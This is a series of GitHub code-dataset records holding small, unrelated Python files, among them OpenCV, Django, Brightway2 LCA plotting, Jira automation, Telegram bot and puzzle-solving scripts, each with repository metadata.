np\r\nimg=cv2.imread('bw.png')\r\nheight=img.shape[0]\r\nwidth=img.shape[1]\r\nchannels=img.shape[2]\r\nimg2=np.zeros((height,width,channels),np.uint8)\r\n\r\n\r\nimg2=cv2.rectangle(img2,(130,0),(230,100),(255,255,255),-1)\r\n\r\nbitAnd=cv2.bitwise_xor(img,img2)\r\n\r\n\r\nprint(height)\r\nprint(width)\r\n\r\n\r\ncv2.imshow('image',img)\r\ncv2.imshow('image2', img2)\r\ncv2.imshow('image3',bitAnd)\r\ncv2.waitKey(0)\r\ncv2.destroyAllWindows()","repo_name":"Ricky-arch/OpenCV","sub_path":"bit_wise_operations_image.py","file_name":"bit_wise_operations_image.py","file_ext":"py","file_size_in_byte":430,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"6303267489","text":"\"\"\"定义Learning_logs的url模式\"\"\"\n\nfrom django.conf.urls import url\n\nfrom . import views\n\nurlpatterns = [\n # Main page\n url(r'^$', views.index, name='index'),\n\n # Show all topics\n url(r'^topics/$', views.topics, name='topics'),\n\n # Special topic to show\n url(r'^topics/(?P<topic_id>\\d+)/$', views.topic, name='topic'),\n]","repo_name":"Snowstark/Learning_log","sub_path":"Learning_logs/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":342,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"71027169332","text":"#!/usr/bin/python3\n\n\n\"\"\"\nbase.py - This module contains the Base class\n\"\"\"\n\nimport json\nimport csv\nimport turtle\n\n\nclass Base:\n \"\"\"\n Base - The base class to manage the 'id' attribute\n \"\"\"\n\n __nb_objects = 0\n\n def __init__(self, id=None):\n \"\"\"\n Constructor for the Base class.\n\n Args:\n id (int, optional): The id to assign to the 'id' attribute\n \"\"\"\n if id is not None:\n self.id = id\n else:\n Base.__nb_objects += 1\n self.id = Base.__nb_objects\n\n @staticmethod\n def to_json_string(list_dictionaries):\n \"\"\"\n Convert a list of dictionaries to a JSON string representation.\n\n Args:\n list_dictionaries (list): A list of dictionaries.\n\n Returns:\n str: A JSON string representation of the list of dictionaries.\n \"\"\"\n if list_dictionaries is None or len(list_dictionaries) == 0:\n return \"[]\"\n return json.dumps(list_dictionaries)\n\n @classmethod\n def save_to_file(cls, list_objs):\n \"\"\"\n Save a list of instances to a JSON file.\n\n Args:\n list_objs (list): A list of instances that inherit from Base.\n\n Note:\n The filename will be <Class name>.json - example: Rectangle.json.\n If list_objs is None, an empty list will be saved\n The file will be overwritten if it already exists.\n \"\"\"\n filename = cls.__name__ + \".json\"\n if list_objs is None:\n list_objs = []\n list_dicts = [obj.to_dictionary() for obj in list_objs]\n json_string = cls.to_json_string(list_dicts)\n with open(filename, 'w') as file:\n file.write(json_string)\n\n @staticmethod\n def from_json_string(json_string):\n \"\"\"\n Convert a JSON string representation to a list of dictionaries\n\n Args:\n json_string (str): A string representing a list of dictionaries.\n\n Returns:\n list: A list represented by json_string.\n \"\"\"\n if json_string is None or len(json_string) == 0:\n return []\n return json.loads(json_string)\n\n @classmethod\n def create(cls, **dictionary):\n \"\"\"\n Create an instance with all attributes already set.\n\n Args:\n **dictionary: A dictionary containing attribute names and values.\n\n Returns:\n object: An instance with all attributes set.\n \"\"\"\n if cls.__name__ == \"Rectangle\":\n dummy = cls(1, 1)\n elif cls.__name__ == 
\"Square\":\n dummy = cls(1)\n else:\n dummy = None\n\n dummy.update(**dictionary)\n return dummy\n\n @classmethod\n def load_from_file(cls):\n \"\"\"\n Load instances from a JSON file.\n\n Returns:\n list: A list of instances.\n \"\"\"\n filename = cls.__name__ + \".json\"\n try:\n with open(filename, 'r') as file:\n json_string = file.read()\n list_dicts = cls.from_json_string(json_string)\n return [cls.create(**dictionary) for dictionary in list_dicts]\n except FileNotFoundError:\n return []\n\n @classmethod\n def save_to_file_csv(cls, list_objs):\n if list_objs is None:\n list_objs = []\n filename = cls.__name__ + \".csv\"\n with open(filename, 'w', newline='') as file:\n writer = csv.writer(file)\n for obj in list_objs:\n if cls.__name__ == \"Rectangle\":\n writer.writerow([obj.id, obj.width, obj.height, obj.x, obj.y])\n elif cls.__name__ == \"Square\":\n writer.writerow([obj.id, obj.size, obj.x, obj.y])\n\n @classmethod\n def load_from_file_csv(cls):\n filename = cls.__name__ + \".csv\"\n try:\n with open(filename, 'r', newline='') as file:\n reader = csv.reader(file)\n obj_list = []\n for row in reader:\n row = [int(val) for val in row]\n if cls.__name__ == \"Rectangle\":\n obj = cls(1, 1)\n obj.id, obj.width, obj.height, obj.x, obj.y = row\n elif cls.__name__ == \"Square\":\n obj = cls(1)\n obj.id, obj.size, obj.x, obj.y = row\n obj_list.append(obj)\n return obj_list\n except FileNotFoundError:\n return []\n\n @staticmethod\n def draw(list_rectangles, list_squares):\n screen = turtle.Screen()\n screen.bgcolor(\"white\")\n\n for rect in list_rectangles:\n t = turtle.Turtle()\n t.speed(1)\n t.penup()\n t.goto(rect.x, rect.y)\n t.pendown()\n for _ in range(2):\n t.forward(rect.width)\n t.left(90)\n t.forward(rect.height)\n t.left(90)\n\n for sq in list_squares:\n t = turtle.Turtle()\n t.speed(1)\n t.penup()\n t.goto(sq.x, sq.y)\n t.pendown()\n for _ in range(4):\n t.forward(sq.size)\n t.left(90)\n\n turtle.done()\n","repo_name":"billwk254/alx-higher_level_programming","sub_path":"0x0C-python-almost_a_circle/models/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":5266,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"8766503353","text":"def reverseString1(str):\n return str[::-1]\n\n# use stack to solve problem\ndef reverseString2(str):\n stack = []\n for ch in str:\n stack.append(ch)\n\n result = \"\"\n while len(stack) > 0:\n result += stack.pop()\n\n return result","repo_name":"leeyulkyu/giveMeAChance","sub_path":"reverseString.py","file_name":"reverseString.py","file_ext":"py","file_size_in_byte":251,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"36945657535","text":"import random\n\nclass Room():\n def __init__(self, room_id):\n self.room_id = room_id\n self.host_id = None\n self.users = []\n self.options = {\n 'ripple_time' : 3,\n 'cooldown' : 0,\n 'send_image' : True,\n 'show_id' : False,\n 'dark_mode' : False\n }\n \n @staticmethod\n def generate_hash(length):\n h = ''\n for _ in range(length):\n d = chr(random.randint(48,57))\n u = chr(random.randint(65,90))\n l = chr(random.randint(97,122))\n h += random.choice([d,u,l])\n return h\n\nif __name__ == '__main__':\n print(Room.generate_hash(5))\n","repo_name":"Tajam/ripple-diary","sub_path":"room.py","file_name":"room.py","file_ext":"py","file_size_in_byte":708,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} 
+{"seq_id":"29099589184","text":"import random\r\n\r\nsalaires = 12\r\nyear = 0\r\nlistesalaires = []\r\nshuffle = 0\r\n\r\nfor i in range(salaires):\r\n wallet = random.randint(0, 10000)\r\n print(wallet)\r\n if wallet < 5000:\r\n print(\"Vous avez moins de 5000 euros ce mois-ci\")\r\n elif wallet >= 5000:\r\n print(\"Vous avez 5000 euros ou plus!\")\r\n year += wallet\r\n listesalaires.append(year)\r\n\r\nprint(\"Cette année, vous avez eu \", year, \" euros !\")\r\nbinary = bin(year)\r\nprint(\"En binaire\", year,\" s'écrit \", binary, \" !\")\r\n\r\ndef rappel() :\r\n shuffle = random.randint(1, 2)\r\n if shuffle ==1:\r\n print(\"Voici la liste des salaires de cette année : \", listesalaires)\r\n elif shuffle ==2:\r\n random.shuffle(listesalaires)\r\n print(\"Voici la liste des salaires de cette année dans le désordre : \", listesalaires)\r\n\r\ndef longueur (a):\r\n print(\"Le mot contient\", len(a), \" caractères\")\r\n\r\nlongueur(\"Informatique\")\r\nrappel()\r\n","repo_name":"matteolg/nsiworks","sub_path":"matt.py","file_name":"matt.py","file_ext":"py","file_size_in_byte":930,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"42218079054","text":"import brightway2 as bw\nimport numpy as np\nimport pandas as pd\nimport itertools\n\nimport bokeh.io\nimport bokeh.plotting\nimport bokeh.models.tools\nimport bokeh.layouts\nimport bokeh.models\nfrom bokeh.palettes import Category10_10 as palette\nfrom bokeh.transform import dodge\n\n\n\n# bokeh constants\nwidth = 900\nheight = 300\n\n\ndef getILCDMethods():\n aoMethods = [m for m in bw.methods if \"ILCD\" in str(m) and \"2018\" in str(m) and \"LT\" not in str(m)]\n return aoMethods\n\ndef doLCA(oActivity, aoMethods, HHV=None):\n if HHV:\n functional_unit = {oActivity:1/HHV}\n else:\n functional_unit = {oActivity:1}\n oLCA = bw.LCA(functional_unit, aoMethods[0])\n oLCA.lci()\n oLCA.lcia()\n dScores = {aoMethods[0]:oLCA.score}\n for oMethod in aoMethods[1:]:\n oLCA.switch_method(oMethod)\n oLCA.lcia()\n dScores[oMethod] = oLCA.score\n return dScores, oLCA\n\n\ndef compareStaticLCA_interactive(dScores1, dScores2, sFileName=\"static_LCA_comparison.html\", legend1=None, legend2=None):\n\n # check if same methods have been used, abort if not\n if not dScores1.keys() == dScores2.keys():\n print(\"Methods are different. 
Comparison invalid.\")\n return\n\n # plot layout options\n bar_width = 0.5\n\n # extract method names, units\n ltMethods = [m for m in dScores1.keys()]\n lsUnits = [bw.Method(m).metadata[\"unit\"] for m in dScores1.keys()]\n lsNames = [\", \".join(bw.Method(m).name) for m in dScores1.keys()]\n lsMethodLabels = lsNames\n\n # normalized values\n normalized_v1 = np.array([np.sign(v) for v in dScores1.values()])\n normalized_v2 = np.array([np.sign(v2)*np.abs(v2/v1) for v1, v2 in zip(dScores1.values(), dScores2.values())])\n\n # bar labels = actual values\n lsBarLabels1 = [\"%.2e \" % v + unit for v, unit in zip(dScores1.values(), lsUnits)]\n lsBarLabels2 = [\"%.2e \" % v + unit for v, unit in zip(dScores2.values(), lsUnits)]\n\n # putting it all together\n source1 = bokeh.models.ColumnDataSource(\n data=dict(\n y=normalized_v1,\n method=lsMethodLabels,\n value=lsBarLabels1,\n methods = ltMethods\n )\n )\n source2 = bokeh.models.ColumnDataSource(\n data=dict(\n y=normalized_v2,\n method=lsMethodLabels,\n value=lsBarLabels2,\n methods = ltMethods\n )\n )\n\n TOOLTIPS = [\n (\"method\", \"@method\"),\n (\"value\", \"@value\")\n ]\n\n # plot\n f = bokeh.plotting.figure(x_axis_label=\"indicator\", y_axis_label='normalized impact [-]',\n plot_width=width, plot_height=height*3, tooltips = TOOLTIPS,\n x_range=bokeh.models.FactorRange(*ltMethods))\n p1 = f.vbar(x=\"methods\", top=\"y\", width=bar_width, color=palette[0], alpha=0.6, source=source1)\n p2 = f.vbar(x=dodge('methods', bar_width/2, range=f.x_range), top=\"y\", width=bar_width, color=palette[1], alpha=0.6, source=source2)\n\n # build legend\n legend = bokeh.models.Legend(items=[\n (legend1, [p1]),\n (legend2, [p2]),\n ], location=\"center\", orientation=\"horizontal\", label_width=75)\n f.add_layout(legend, 'above')\n\n # font sizes\n font_size = \"15pt\"\n f.xaxis.axis_label_text_font_size = \\\n f.yaxis.axis_label_text_font_size = \\\n f.xaxis.major_label_text_font_size = \\\n f.yaxis.major_label_text_font_size = \\\n f.legend.label_text_font_size = font_size\n\n # x label rotation\n f.xaxis.major_label_orientation = np.pi / 2\n\n # add tool for strict y-axis zoom\n f.add_tools(bokeh.models.WheelZoomTool(dimensions=\"height\"))\n\n # show the results\n bokeh.io.output_notebook()\n bokeh.io.show(f)\n pass\n\n\ndef plotContributionAnalysis(dContributions, sFileName, lsFromActivities=None, sDatabase=None, bLegend=True, fCutOff=0.005):\n\n oParentActivity = list(dContributions.values())[0][0][\"from\"][0]\n\n # find contributions, save in list\n ldMethodActContrib = []\n for oMethod, ldContributions in dContributions.items():\n\n # break down contributions to\n # a) direct contributions to parent activity if no names supplied\n # b) contributions from activities originating in databases which are not sDatabase\n # c) contributions of activities supplied by user, if names are given\n if lsFromActivities:\n direct_contributions = [c for c in ldContributions if c[\"from\"][-1][\"name\"] in lsFromActivities]\n elif sDatabase:\n direct_contributions = [\n c for c in ldContributions if (\n c[\"from\"][-1].get(\"database\",\"\") != sDatabase and\n c[\"to\"][-1].get(\"database\",\"\") == sDatabase and\n not bool(c[\"to\"][-1].get(\"aggregate\",False))\n ) or (\n bool(c[\"from\"][-1].get(\"aggregate\", False))\n )\n ]\n else:\n direct_contributions = [c for c in ldContributions if c[\"to\"] == [oParentActivity]]\n\n\n # save method name, activity name, relative contribution to impact in dictionary\n fuGetName = lambda x: \\\n 
(x[\"from\"][-1][\"database\"] == \"biosphere3\") * x[\"to\"][-1][\"name\"] +\\\n (x[\"from\"][-1][\"database\"] != \"biosphere3\") * x[\"from\"][-1][\"name\"]\n ld = [{\n \"method\":oMethod,\n \"activity\":fuGetName(a).replace(\"{\",\"(\").replace(\"}\",\")\").replace(\"|\",\", \"), # replace {} from simapro activities to prevent errors\n \"contribution\": np.sign(a[\"global impact\"]) * abs(a[\"global impact\"] / ldContributions[0][\"global impact\"])\n } for a in direct_contributions]\n\n ldMethodActContrib += ld\n\n # make dataframe from list of dict\n dfContributions = pd.DataFrame(ldMethodActContrib)\n dfContributions = dfContributions.groupby(['method', 'activity']).sum().reset_index()\n\n # remove entries smaller than cutoff\n dfContributions = dfContributions[dfContributions[\"contribution\"].abs() >= fCutOff*abs(dfContributions[\"contribution\"].max())]\n\n # pivot, replace 0 with nan\n dfPivoted = dfContributions.pivot(index=\"method\", columns=\"activity\", values=\"contribution\")\n dfPivoted.fillna(0, inplace=True)\n\n # creating necessary dicts and lists for bokeh plot\n data_pos = {c : dfPivoted[c].values * (dfPivoted[c].values > 0) for c in dfPivoted.columns}\n data_neg = {c : dfPivoted[c].values * (dfPivoted[c].values < 0) for c in dfPivoted.columns}\n methods = dfContributions[\"method\"].unique()\n activities = dfPivoted.columns\n colors = [c for a, c in zip(activities, itertools.cycle(palette))]\n data_neg[\"methods\"] = data_pos[\"methods\"] = methods\n source1 = bokeh.models.ColumnDataSource(data=data_pos)\n source2 = bokeh.models.ColumnDataSource(data=data_neg)\n TOOLTIPS = [\n (\"method\", \"@methods\"),\n (\"activity\", \"$name\"),\n (\"contribution\", \"@$name\")\n ]\n\n # plot contributions per category\n f = bokeh.plotting.figure(x_axis_label=\"indicator\", y_axis_label='contribution to impact [-]',\n plot_width=width, plot_height=height*3, tooltips = TOOLTIPS,\n x_range=bokeh.models.FactorRange(*methods))\n p1 = f.vbar_stack(activities, x=\"methods\", width=0.5, alpha=0.6, fill_color=colors, line_color=\"white\", source=source1)\n f.vbar_stack(activities, x=\"methods\", width=0.5, alpha=0.6, fill_color=colors, line_color=\"white\", source=source2)\n\n # x label rotation\n f.xaxis.major_label_orientation = np.pi / 2\n\n # build legend\n if bLegend:\n legend = bokeh.models.Legend(items=[(l,[p]) for l,p in zip(activities,p1)], location=\"center\")\n f.add_layout(legend, 'above')\n\n # font sizes\n font_size = \"15pt\"\n f.xaxis.axis_label_text_font_size = \\\n f.yaxis.axis_label_text_font_size = \\\n f.xaxis.major_label_text_font_size = \\\n f.yaxis.major_label_text_font_size = \\\n f.legend.label_text_font_size = font_size\n\n # add tool for strict y-axis zoom\n f.add_tools(bokeh.models.WheelZoomTool(dimensions=\"height\"))\n\n # show the results\n bokeh.io.output_notebook()\n bokeh.io.show(f)\n\n pass\n","repo_name":"BenPortner/indirect_land_use_change_PV_corn","sub_path":"helper_functions.py","file_name":"helper_functions.py","file_ext":"py","file_size_in_byte":8134,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"38509437922","text":"import csv\nfrom jira import client\nimport logging\n\n\nLG = logging.getLogger(__name__)\n\nTASK_TEMPLATE = \"\"\"h2. Requirements\n\nA description of the requirements for this item: This could include all or any of:\n* use cases\n* functional requirements\n* non-functional requirements\n* describe missing tests\n\nh2. 
Completion Criteria\n\nThis should list, preferably in bullet form, all of the criteria for completion of this task. Once these items have been met, the task is complete.\n\"\"\"\n\n\nclass ReleaseIssues:\n \"\"\"Reads issues from CSV\"\"\"\n\n def __init__(self, input_file):\n self._current = 0\n self._header = None\n self._tasks = None\n with open(input_file, 'rb') as csvfile:\n test_reader = csv.reader(csvfile)\n for row in test_reader:\n if self._header is None:\n self._header = [x.lower() for x in row]\n self._tasks = []\n continue\n\n record = dict(zip(self._header, row))\n self._tasks.append(record)\n\n @property\n def tasks(self):\n return self._tasks\n\n\n\n\ndef run(parsed_args):\n \"\"\"Execute release task creation\n\n parsed_args: command line arguemnts\"\"\"\n\n assert parsed_args.server\n assert parsed_args.user\n assert parsed_args.password\n assert parsed_args.ticket_file\n assert parsed_args.epic\n\n jira = None\n if not parsed_args.dry_run:\n jira = client.JIRA(server=parsed_args.server,\n basic_auth=(parsed_args.user, parsed_args.password))\n\n r = ReleaseIssues(parsed_args.ticket_file)\n for t in r.tasks:\n try:\n description = TASK_TEMPLATE\n issue_dict = {\n 'project': t.get('project'),\n 'summary': t.get('summary'),\n 'description': description,\n 'issuetype': {'name': 'Task'},\n # 'fixVersion': t.get('fixVersion'),\n # 'priority': t.get('priority'),\n }\n LG.error(issue_dict)\n if jira is not None:\n new_issue = jira.create_issue(fields=issue_dict)\n jira.add_issues_to_epic(parsed_args.epic, [new_issue.key])\n print('%s,%s' % (new_issue.key, new_issue.summary))\n except Exception as e:\n print('Unable to add issue: %s' % e)\n print('Unable to issue: %s' % t)\n","repo_name":"delapsley/relman","sub_path":"relman/cmd/release.py","file_name":"release.py","file_ext":"py","file_size_in_byte":2398,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"32707350020","text":"#!/usr/bin/env python3\nimport copy\nimport functools\nimport json\nimport itertools\nimport utils\nimport math\nfrom dataclasses import dataclass\nfrom typing import Tuple, List\n\n\n@dataclass\nclass NodePointer:\n value: object\n index: int\n level: int\n _position: Tuple[List, int]\n\n @property\n def is_primitive(self):\n return type(self.value) == int\n\n @property\n def is_regular(self):\n return type(self.value) == list and all(type(v) == int for v in self.value)\n\n def replace(self, new_value):\n lst, idx = self._position\n lst[idx] = new_value\n\n\ndef pointers(value, level=0, counter=None):\n counter = counter or itertools.count()\n for i, elem in enumerate(value):\n yield NodePointer(elem, next(counter), level + 1, (value, i))\n if type(elem) != int:\n yield from pointers(elem, level + 1, counter)\n\n\ndef try_explode(value):\n left_ptr = None\n exploded_ptr = None\n right_ptr = None\n\n for ptr in pointers(value):\n if exploded_ptr is None:\n if ptr.is_primitive:\n left_ptr = ptr\n elif ptr.level == 4 and ptr.is_regular:\n exploded_ptr = ptr\n elif ptr.index > exploded_ptr.index + 2 and ptr.is_primitive:\n right_ptr = ptr\n break\n\n if exploded_ptr:\n a, b = exploded_ptr.value\n if left_ptr:\n left_ptr.replace(left_ptr.value + a)\n if right_ptr:\n right_ptr.replace(right_ptr.value + b)\n exploded_ptr.replace(0)\n return True\n return False\n\n\ndef try_split(value):\n for ptr in pointers(value):\n if ptr.is_primitive and ptr.value >= 10:\n value = ptr.value\n ptr.replace([int(math.floor(value / 2)), int(math.ceil(value / 2))])\n 
return True\n return False\n\n\ndef sf_reduce(value):\n while True:\n if try_explode(value):\n continue\n if try_split(value):\n continue\n return\n\n\ndef sf_add(a, b):\n result = [copy.deepcopy(a), copy.deepcopy(b)]\n sf_reduce(result)\n return result\n\n\ndef magnitude(elem):\n if type(elem) == int:\n return elem\n else:\n a, b = elem\n return 3 * magnitude(a) + 2 * magnitude(b)\n\n\ndef main():\n numbers = [json.loads(line.strip()) for line in utils.input()]\n result = functools.reduce(sf_add, numbers)\n print(result)\n print(magnitude(result))\n magnitudes = (magnitude(sf_add(a, b)) for a, b in itertools.permutations(numbers, 2))\n print(max(magnitudes))\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"technocoreai/aoc2021","sub_path":"aoc18.py","file_name":"aoc18.py","file_ext":"py","file_size_in_byte":2570,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"17942440186","text":"# с помощью данной функции, мы находим периметр всех имеющихся островов на карте.\n# сложность: O(m * n).\n\nclass Solution:\n def islandPerimeter(self, grid: List[List[int]]) -> int:\n\n # задаем переменную для результата\n perimeter = 0\n\n # создаем переменные для колонок и рядов\n height, weight = len(grid), len(grid[0])\n\n # циклами проходим по всем элементам на карте\n for row in range(height):\n for column in range(weight):\n\n # присваиваем каждому острову периметр 4\n if grid[row][column]:\n perimeter += 4\n\n # если над островом есть еще остров, то вычитаем 2\n if row and grid[row-1][column]:\n perimeter -= 2\n\n # если слева острова есть еще остров, то вычитаем 2\n if column and grid[row][column-1]:\n perimeter -= 2\n\n return perimeter\n","repo_name":"blinmakersha/HW_algorithm_1_semestr","sub_path":"HW_3/fifth_task.py","file_name":"fifth_task.py","file_ext":"py","file_size_in_byte":1249,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"28798301033","text":"from telegram import Update, ReplyKeyboardMarkup\nfrom telegram.ext import ContextTypes, CommandHandler, MessageHandler, filters, ConversationHandler\nimport word as w\nfrom home_markup import markup, goHome\n\n# /add 관련 state 설정\nSEARCH_ITEM, APPLY_ITEM = range(2)\n\nasync def add_command(update: Update, context: ContextTypes.DEFAULT_TYPE):\n await update.message.reply_text(\"가격변동 알리미 🔔\\n검색어를 상세하게 입력해주세요 🔍\\n최대 15개의 상품이 조회됩니다.\")\n return SEARCH_ITEM\n\n\n# 아이템 검색\nasync def search_list(update: Update, context: ContextTypes.DEFAULT_TYPE):\n await update.message.reply_text(\"상품을 검색중입니다. 
잠시만 기다려주세요 🔍\")\n # 검색이 됐다고 가정을 하는 리스트\n data_list = [\n [\"등록완료\"],\n [\"아이패드 프로 12.9 5세대 M1^_^v_\"],\n [\"아이패드 프로 11인치 3세대 M1^_^v_\"],\n [\"아이패드 거치대^_^v_\"],\n [\"아이패드 미니 6세대 64Gb 와이파이^_^v_\"],\n [\"에러발생용 미니 6세대 64Gb 와이파이\"]\n ]\n reply_list = ReplyKeyboardMarkup(data_list, one_time_keyboard=False)\n await update.message.reply_text(\"알림 받기 원하는 상품을 클릭해주세요 🔔\\n여러개 선택이 가능하며, 모두 선택 후 완료 버튼을 눌러주세요 😊\", reply_markup=reply_list)\n return APPLY_ITEM\n\n\n# 아이템 등록\nasync def add_item(update: Update, context: ContextTypes.DEFAULT_TYPE):\n message = update.message.text\n\n if(w.PARSER in message):\n try:\n await update.message.reply_text(\"선택상품 등록 완료 :: {}\".format(message))\n except:\n await update.message.reply_text(\"등록중 오류가 발생했습니다 🚫\\n🔽 키보드 왼쪽 메뉴를 이용해주세요\", reply_markup=markup)\n return ConversationHandler.END\n else:\n await goHome(update=update)\n return ConversationHandler.END\n\n\nasync def done_add_item(update: Update, context: ContextTypes.DEFAULT_TYPE):\n await goHome(update=update)\n return ConversationHandler.END\n\n\nasync def error_task(update: Update, context: ContextTypes.DEFAULT_TYPE):\n await goHome(update=update)\n return ConversationHandler.END\n\n\n# 핸들러 설정\nconv_handler = ConversationHandler(\n entry_points=[CommandHandler(\"add\", add_command)],\n states={\n # 아이템 검색\n SEARCH_ITEM: [\n MessageHandler(filters.TEXT, search_list)\n ],\n # 아이템 등록\n APPLY_ITEM: [\n # 1. 등록완료\n MessageHandler(filters.Regex(\"^({})$\".format(w.ADD_DONE)), done_add_item ),\n # 2. 계속등록\n MessageHandler(filters.TEXT & ~(filters.COMMAND), add_item)\n ]\n },\n fallbacks=[MessageHandler(filters.TEXT, error_task)],\n )","repo_name":"flxh4894/python_study","sub_path":"handler/custom_add_handler.py","file_name":"custom_add_handler.py","file_ext":"py","file_size_in_byte":2929,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"2796965640","text":"# Write a function named unique_common that accepts two lists both of which contain integers as parameters and returns a sorted list (ascending order) which contains unique common elements from both the lists. If there are no common elements between the two lists, then your function should return the keyword None\n#\n# For example, if two of the lists received by the function are:\n#\n# ([5, 6, -7, 8, 8, 9, 9, 10], [2, 4, 8, 8, 5, -7])\n#\n# You can see that elements 5, -7, and 8 are common in both the first list and the second list and that the element 8 occurs twice in both lists. 
Now you should return a sorted list (ascending order) of unique common elements like this:\n#\n# [-7, 5, 8]\n#\n# if the two lists received by the function are:\n#\n# ([5, 6, 7, 0], [3, 2, 3, 2])\n#\n# Since, there are no common elements between the two lists, your function should return the keyword\n#\n#None\n#\n# compara los elementos entre a y b\ndef unique_common(a, b):\n lista_extendida=[]\n for x in a:\n if x in b:\n lista_extendida.append(x)\n evalua_funcion_lista_depurada = funcion_lista_depurada(lista_extendida)\n if evalua_funcion_lista_depurada!=[]:\n return evalua_funcion_lista_depurada\n\n# Funcion recibe lista completa y elimina numeros repetidos\ndef funcion_lista_depurada(lista_extendida):\n lista_final = []\n for i in lista_extendida:\n if i not in lista_final:\n lista_final.append(i)\n lista_final.sort()\n registros = int(len(lista_final)) \n #return lista_final, registros\n return lista_final\n \n# OJO SOLO LA FUNCION!!!\n# Main Program #\na = [1,2,3,4,5,6,5,7,8,9,-1]\nb = [4,9,10,12,-1,5,13,1]\nevalua_unique_common = unique_common(a, b) \nprint(evalua_unique_common)\n","repo_name":"ivanromanv/manuales","sub_path":"Python/Edx_Course/Introduction to Programming Using Python/Excercises/W5_Midterm Exam_elementos_comunes_unicos.py","file_name":"W5_Midterm Exam_elementos_comunes_unicos.py","file_ext":"py","file_size_in_byte":1717,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"25855823010","text":"from django.http import JsonResponse\nimport json\n\n# 导入 city \nfrom common.models import Citylog\n\ndef dispatcher(request):\n # 将请求参数统一放入request 的 params 属性中,方便后续处理\n\n # GET请求 参数在url中,同过request 对象的 GET属性获取\n if request.method == 'GET':\n request.params = request.GET\n\n # POST/PUT/DELETE 请求 参数 从 request 对象的 body 属性中获取\n elif request.method in ['POST','PUT','DELETE']:\n # 根据接口,POST/PUT/DELETE 请求的消息体都是 json格式\n request.params = json.loads(request.body)\n\n\n # 根据不同的action分派给不同的函数进行处理\n action = request.params['action']\n if action == 'list_city':\n return listcities(request)\n elif action == 'add_city':\n return addcity(request)\n elif action == 'modify_city':\n return modifycity(request)\n elif action == 'del_city':\n return deletecity(request)\n\n else:\n return JsonResponse({'ret': 1, 'msg': '不支持该类型http请求'})\n\ndef listcities(request):\n # 返回一个 QuerySet 对象 ,包含所有的表记录\n qs = Citylog.objects.values()\n\n # 将 QuerySet 对象 转化为 list 类型\n # 否则不能 被 转化为 JSON 字符串\n retlist = list(qs)\n\n return JsonResponse({'ret': 0, 'retlist': retlist})\n\ndef addcity(request):\n\n info = request.params['data']\n\n # 从请求消息中 获取要添加客户的信息\n # 并且插入到数据库中\n # 返回值 就是对应插入记录的对象 \n record = Citylog.objects.create(key=info['key'] ,\n time=info['time'])\n\n return JsonResponse({'ret': 0, 'id':record.id})\n\n\ndef modifycity(request):\n\n # 从请求消息中 获取修改客户的信息\n # 找到该客户,并且进行修改操作\n \n cityid = request.params['id']\n newdata = request.params['newdata']\n\n try:\n # 根据 id 从数据库中找到相应的客户记录\n city = Citylog.objects.get(id=cityid)\n except Citylog.DoesNotExist:\n return {\n 'ret': 1,\n 'msg': f'id 为`{cityid}`的城市不存在'\n }\n\n\n if 'key' in newdata:\n city.key = newdata['key']\n if 'time' in newdata:\n city.time = newdata['time']\n\n # 注意,一定要执行save才能将修改信息保存到数据库\n city.save()\n\n return JsonResponse({'ret': 0})\n\ndef deletecity(request):\n\n cityname = request.params['key']\n\n try:\n # 根据 key 从数据库中找到相应的城市记录\n cityinfo = Citylog.objects.get(key=cityname)\n except Citylog.DoesNotExist:\n return {\n 'ret': 1,\n 'msg': f'key 为`{cityname}`的城市不存在'\n }\n\n # delete 
方法就将该记录从数据库中删除了\n cityinfo.delete()\n\n return JsonResponse({'ret': 0})","repo_name":"sssjmmm/Microservice-Architecture","sub_path":"backend-projects/bysms/mgr/log.py","file_name":"log.py","file_ext":"py","file_size_in_byte":2910,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"17485594882","text":"\"\"\"KVRX URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/1.9/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.conf.urls import url, include\n 2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))\n\"\"\"\n\nfrom django.conf.urls import include, url\nfrom django.contrib import admin\nfrom . import views\n\nurlpatterns = [\n #Index\n url(r'^$', views.index, name=\"pages_index\"),\n #Hardcoded pages\n url(r'^base', views.base, name=\"pages_base\"), #REMOVE IN PRODUCTION\n url(r'^shows', views.shows, name=\"pages_shows_index\"),\n url(r'^login', views.login, name=\"pages_login\"),\n #Keyword pages\n url(r'^dj/(?P<djName>.+)/$', views.dj_detail, name=\"pages_dj_detail\"),\n url(r'^show/(?P<namegiven>.+)/$', views.show_detail, name=\"pages_show_detail\"),\n #User created pages (CMS)\n url(r'^(?P<p>.+)/$', views.custom_page, name=\"pages_custom_page\"),\n]\n\nadmin.site.site_header = 'KVRX Admin'\nadmin.site.site_title = 'KVRX 